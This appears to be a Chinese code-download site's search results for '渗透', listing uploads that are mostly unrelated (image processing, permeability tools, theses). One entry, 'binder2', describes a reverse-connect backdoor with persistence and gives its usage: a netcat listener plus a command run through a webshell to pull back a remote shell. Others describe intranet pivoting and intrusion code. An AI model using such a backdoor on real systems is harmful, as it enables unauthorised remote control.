CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 搜索资源 - 渗透

搜索资源列表

  1. 组合加密软件包 Lock Manage 5

    0下载:
  2. Lock Manage 是一个功能比较全面的加密软件。 它具有多种加密方案:如文件口令加密,文件反拷贝加密,软硬盘加密,安装加密,文本加密,批处理加密等等。系统是由C和汇编写成,可从外部链接于主模块。可单独编译,单独调试。可执行EXE/COM程序加密模块已经过长时间的测试分析,其工作性能己十分稳定。可移植性与兼容性很好。另外,代码实现了CS,DS不换技术,使其SHELL性能难以被DEBUG识别。其内部密码采用单向不可逆变换,基本实现了不可解,原因在于四个随机密钥只能用穷举法找出。这种可靠原四密钥
  3. 所属分类:加密解密

    • 发布日期:2008-10-13
    • 文件大小:102537
    • 提供者:何福保
  1. 数字图像几何变换

    0下载:
  2. 几何变换是最常见的图像处理手段,通过对变形的图像进行几何校正,可以得出准确的图像。常用的几何变换功能包括图像的平移、图像的镜像变换、图像的转置、图像的缩放、图像的旋转等等。目前数字图像处理的应用越来越广泛,已经渗透到工业、航空航天、军事等各个领域,在国民经济中发挥越来越大的作用。 作为数字图像处理的一个重要部分,本文介绍的工作是如何用Visual C++编程工具设计一个完整的应用程序,实现经典的图像几何变换功能。程序大概分为两大部分:读写BMP图像,和数字图像的几何变换。即首先用Visual
  3. 所属分类:Windows编程

    • 发布日期:2008-10-13
    • 文件大小:909332
    • 提供者:陈万通
  1. binder2

    0下载:
  2. 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
  3. 所属分类:防火墙与安全工具

    • 发布日期:2008-10-13
    • 文件大小:12283
    • 提供者:张军
  1. MatlabandVB

    0下载:
  2. 第一章 概述 辨识(Identification)、状态估计和控制理论在现代控制理论中是密不可分的,它们互相渗透。辨识和状态估计离不开控制理论的支持,控制理论的应用几乎不能没有辨识和估计技术。由此可见,辨识在科研与实际应用领域都有很高的实用价值。 所谓辨识,就是从含有噪声的输入、输出数据中提取被研究对象的数据模型。此数据模型只是过程的输入输出特性在某种意义下的近似,而近似的准确度一般取决于采样数据的精度以及辨识方法的合理性。 辨识的目的是根据过程所提供测量的数据等信息,在某种准则意
  3. 所属分类:matlab例程

    • 发布日期:2008-10-13
    • 文件大小:40799
    • 提供者:松鼠
  1. quizaspcode

    0下载:
  2. 网上考试系统 随着社会的发展,网络无处不在,它渗透进我们生活的方方面面,包括考试在内。这个网上考试系统有外国友人设计,采用选择题方式进行,最后给出综合评价。 -online examination system along with the development of society, everywhere in the network, which infiltrated every aspect of our lives. Examinations, including. The on
  3. 所属分类:Internet/网络编程

    • 发布日期:2008-10-13
    • 文件大小:12865
    • 提供者:wu
  1. the_wireless_network_in_digital_family

    0下载:
  2. 随着数字家庭技术的不断进步,数字产品日益渗透到社会生活的各个领域,这些为未来数字家庭的实现奠定了基础。本文从数字家庭中无线网络的角度出发,分析了家庭无线网络应满足的技术要求;从普通数据传输和支持流媒体应用等方面比较了目前市场上家庭无线网络技术解决方案的特点;结合数字家庭中对数据传输的要求,着重描述了目前主流无线网络的技术发展走向,最后介绍了家庭无线网络的多种新应用模式。-the continuous advancement of technology, the growing penetrati
  3. 所属分类:行业发展研究

    • 发布日期:2008-10-13
    • 文件大小:814925
    • 提供者:麦克狼
  1. transport

    0下载:
  2. 有关内网渗透时候的端口转发源程序,欢迎大家使用。在进行外网控内网一台跳板然后控制其他内网机器的工具。-within the network penetration when the port forwarding source, all are welcome to use. Conducting external networks control network within a springboard then control other machines within the networ
  3. 所属分类:弱点检测代码

    • 发布日期:2014-01-15
    • 文件大小:4157
    • 提供者:anke
  1. s200_PLC_pro

    2下载:
  2. 针对热电厂锅炉补水水处理控制程序,用simens s224,包括多介质,反渗透,混床控制
  3. 所属分类:人工智能/神经网络/遗传算法

    • 发布日期:2008-10-13
    • 文件大小:14286
    • 提供者:name chen
  1. hithit

    0下载:
  2. 水晶连连看是个不错的休闲小游戏,一次玩急眼了,开发了这个自动点击的程序。涉及到屏幕捕捉,图形分析,窗口消息等技术。实际上不属于真正的外挂,因为没用渗透技术。改一下就能对付连连看类型的网络小游戏了。
  3. 所属分类:外挂编程

    • 发布日期:2008-10-13
    • 文件大小:538727
    • 提供者:gk
  1. qq

    0下载:
  2. 专家系统应用(Expert System Application)是针对实际领域,建造专家系统,用来辅助或代替领域专家解决实际问题。专家系统是人工智能的重要分支,它是人工智能学者从探讨一般思维规律方法走向以专门知识信息处理为中心的转折点。目前,专家系统的应用几乎渗透到各行各业。
  3. 所属分类:软件工程

    • 发布日期:2008-10-13
    • 文件大小:833314
    • 提供者:王八
  1. permeability-producer

    1下载:
  2. 用于产生垂向渗透率 根据的是渗透率变异系数 其中层数可以任意给定
  3. 所属分类:开发工具

    • 发布日期:2008-10-13
    • 文件大小:174506
    • 提供者:wang
  1. qtst

    0下载:
  2. 气体渗透率 用于气体渗透率测量控制
  3. 所属分类:Delphi控件源码

    • 发布日期:2008-10-13
    • 文件大小:13871
    • 提供者:吹风
  1. network_intrusion_sourcecode

    0下载:
  2. 网络渗透技术配书源码,主要包括缓冲区溢出漏洞的利用,sql注入等技术的代码
  3. 所属分类:SQL Server数据库

    • 发布日期:2008-10-13
    • 文件大小:5013186
    • 提供者:lee
  1. PROTEUS

    0下载:
  2. PROTEUS单片机技术是现代电子工程领域一门迅速发展的技术,它的应用已经渗透到各种嵌入式系统中。
  3. 所属分类:其它

    • 发布日期:2008-10-13
    • 文件大小:2045633
    • 提供者:独用
  1. 绘制半透明位图及如何画透明位图

    0下载:
  2. 绘制半透明位图及如何画透明位图 有的时侯,我们希望显示一幅半透明的位图。也就是说我们将一幅位图B 显示到A位图上,又希望透过B位图看到A位图的一部分图像但不是全部。比如A位 图是一幅曲线图,B是一幅提示位图,我们想在显示提示的同时看到已显示的曲 线,但不需要曲线的背景 ,就需有用到半透明位图。曲线看上去就象从B位图中渗 透过来,其实半透明技术就是一种渗透技术,渗透公式我们可选用多种,在这里 我们选用(A AND 0x7F)OR B。注意,白色不能产生渗透。-rendering transluce
  3. 所属分类:其它

    • 发布日期:2008-10-13
    • 文件大小:2229
    • 提供者:曾火尧
  1. Visual C++6.0实现灰度位图处理

    0下载:
  2. 图像处理技术已经渗透到人类生活的各个领域并得到越来越多的应用,图像处理所涉及的图像格式有很多种,如TIF、JEMP、BMP等等,工程应用中经常要处理256级的灰度BMP图像,如通过黑白采集卡采集得到的图像-image processing technology has been integrated into all areas of life and to be more and more applications, image processing involved in the forma
  3. 所属分类:图形图象

    • 发布日期:2008-10-13
    • 文件大小:11296
    • 提供者:凌兴德
  1. 开放实验管理系统

    1下载:
  2. 1.1开发背景 近年来,随着信息技术的迅猛发展,计算机早已渗透到人们学习,工作和生活的各个方面,网络改变着人们的教育观念和学习方式,成为人们不可或缺的使用工具。 网络应用得到了迅速普及"信息技术涉及计算机技术!通信技术和网络技术,它们是构成当今信息化社会的三大技术支柱"大学的信息技术教育应在计算机基础教育的基础上,更加突出网络技术及其应用。 作为高等院校教育,应当走在时代发展的前列,计算机教学与应用已成为高等院校全面素质教育中极为重要的一部分,它已深入到各个学科、各个领
  3. 所属分类:教育/学校应用

  1. 智能卡网吧管理系统设计(代码+论文)

    0下载:
  2. 智能卡,又称“集成电路卡”是继凸字卡、条码卡、磁卡等传统标识卡之后出现的一种新型高性能标识卡。 作为一种全新的信息媒体,智能卡不但可以替代传统的标识卡,而且开拓了很多新的应用领域,已经渗透到了诸如:银行、宾馆、公路收费、边境管理、城市收费、电表、电话、煤气表、水表、企业管理、医疗、彩票等上百个领域,大大提高了人们生活的现代化程度,从而将彻底改变现有的管理状态,使管理更科学、更方便,这方面的成就将会更加有效地提高经济效益。 智能卡计费管理系统,可以应用于网吧、学校、政府机关、税务、银行等领域的机
  3. 所属分类:源码下载

    • 发布日期:2010-10-08
    • 文件大小:334134
    • 提供者:garywxy@126.com
  1. 渗透测试靶机平台源码

    0下载:
  2. hackedu源码为渗透测试靶机平台源码,使用于新手,初学者等网络安全工程师本地搭建测试练手.
  3. 所属分类:PHP源码

    • 发布日期:2020-06-24
    • 文件大小:3425176
    • 提供者:nanhack@qq.com
  1. 渗透测试工具——Burp Suite基础介绍一.pdf

    0下载:
  2. 渗透测试工具——Burp Suite基础介绍一.pdf 谢希仁主编 高校经典著作 网络编程入门
  3. 所属分类:其它

« 1 23 4 5 6 7 8 9 10 »
搜珍网 www.dssz.com